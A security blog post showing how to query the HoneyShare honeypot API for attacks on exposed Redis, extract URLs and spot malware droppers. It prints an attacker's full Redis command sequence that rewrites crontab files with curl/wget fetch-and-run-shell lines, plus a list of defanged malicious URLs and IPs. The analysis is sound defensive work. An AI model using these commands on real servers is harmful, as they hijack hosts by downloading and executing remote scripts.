pedro [at] honeyshare [dot] live

Pedro Melgueira

Dissecting Redis Attacks with HoneyShare

It's surprising how much we can learn just by looking at what an attacker sends to an exposed Redis instance. Using only data from HoneyShare's honeypots we can:

  • List commands sent by attackers
  • Gather malicious URLs used for malware dropping
  • Collect malware samples

To start with this we must fetch some data.

Fetching Data

from honeyshare import HoneyShare

hs = HoneyShare(key=API_KEY)

# Get IPs that connect to port 6379, the default Redis port
honey_data = hs.Port(6379).ipv4(pagesize=100)

# Get the payload sent from those IPs
honey_payload = {}

for ip_meta in honey_data["IPv4"]:
    ip = ip_meta["IPv4"]

    payload_data = hs \
        .Port(6379)\
        .payload(ip, pagesize=50, base64_decode=True)

    honey_payload[ip] = [i["Bytes"] for i in payload_data["Connections"]]

The results is a dictionary from IPs to a list of payloads:

{'68.183.115.231': ['\r\n\r\n', '*1\r\n$4\r\ninfo\r\n', ... ],
 '183.136.170.208': ['*1\r\n$4\r\ninfo\r\n', '*1\r\n$7\r\nCOMMAND\r\n*4\r\n$6\r\nconfig\r\n...', ... ],
 ...
}

Filtering for HTTP

That's a lot of data in honey_payload, all resulting from connections to Redis from attackers and scanners. A lot can be explored there, but in this experiment we want to look for urls.

def has_strs(payload, strs):
    payload_low = payload.lower()
    if "http" in payload_low:
        print(payload_entry)

for ip, payload_list in honey_payload.items():
    for payload in payload_list:
        has_strs(payload, "http")

...
set
$7
backup1
$70
*/2 * * * * cd1 -fsSL hxxp://79.137.195.151/cleanfda/init.sh | sh
*3
$3
set
$7
...

Example

We get some entries that contain HTTP. Taking one of them and cleaning it up a bit we get:

COMMAND
config set dbfilename backup.db
save config
set stop-writes-on-bgsave-error no
flushall
set backup1 \n\n\n*/2 * * * * cd1 -fsSL hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup2 \n\n\n*/3 * * * * wget -q -O- hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup3 \n\n\n*/4 * * * * curl -fsSL hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
set backup4 \n\n\n*/5 * * * * wd1 -q -O- hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
config set dir /var/spool/cron/
config set dbfilename root
save
config set dir /var/spool/cron/crontabs
save
flushall
set backup1 \n\n\n*/2 * * * * root cd1 -fsSL hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup2 \n\n\n*/3 * * * * root wget -q -O- hxxp://79.xxx.xxx.151/cleanfda/init.sh | sh\n\n
set backup3 \n\n\n*/4 * * * * root curl -fsSL hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
set backup4 \n\n\n*/5 * * * * root wd1 -q -O- hxxp://45.xxx.xxx.29/cleanfda/init.sh | sh\n\n
config set dir /etc/cron.d/
config set dbfilename zzh
save
config set dir /etc/
config set dbfilename crontab
save

This is a list of commands sent to Redis. The pattern here can be found several times in HoneyShare data, but the basic idea is that crontab files are being overwritten from within Redis to have calls to wget and curl. These calls download shell scripts and execute them.

Listing URLs

With this notion we can now quickly get a list of every URL sent to Redis honeypots.

import re

# Regular expression for http and https
pattern = r'(http(s)?://[^ ]*)'
urls = set()

for data in honey_payload.values():
    payload_list = data

    for i in payload_list:
        # Get exact matches
        r = re.findall(pattern, i)
        # Get catpuring whole group
        r = [g[0] for g in r]
        # Update set
        urls.update(r)

urls

{"hxxp://103.79.77.16/ep9TS2/ndt.sh",
 "hxxp://185.19.33.145/ep9TS2/ndt.sh",
 "hxxp://194.110.247.97/ep9TS2/ndt.sh",
 "hxxp://45.83.122.25/3nFTk7/init.sh",
 "hxxp://45.83.123.29/cleanfda/init.sh",
 "hxxp://45.89.52.41/ep9TS2/ndt.sh",
 "hxxp://79.137.195.151/cleanfda/init.sh",
 "hxxp://\\\\b.c\\l\\u-e\\.e\\u/t.sh\").read()\"",
 "hxxp://\\\\s.n\\a-c\\s.c\\om/t.sh\").read()\"",
 "hxxp://en2an.top/cleanfda/init.sh",
 "hxxp://etherx.jabber.org/streams'",
 "hxxp://natalstatus.org/ep9TS2/ndt.sh",
 "hxxp://pyats.top/3nFTk7/init.sh",
 "hxxps://104.164.55.217/ep9TS2/ndt.sh",
 "hxxps://about.censys.io/)\r\nContent-Length:",
 "hxxps://internet-measurement.com/)\r\nConnection:",
 "hxxps://matrix.masscan.cloud/ep9TS2/ndt.sh"}

Conclusion

Here we see how a quick analysis in HoneyShare data can yield:

  • Malicious IPs
  • Malicious URLs
  • Malware Samples

In the end, not every URL is malicious. For example there are a few scanners there. But quickly one can fetch malicious items.

Learn more about HoneyShare, explore the API and library.

Published: 2025-06-25
#HoneyShare #CyberSec
© Pedro Melgueira, 2025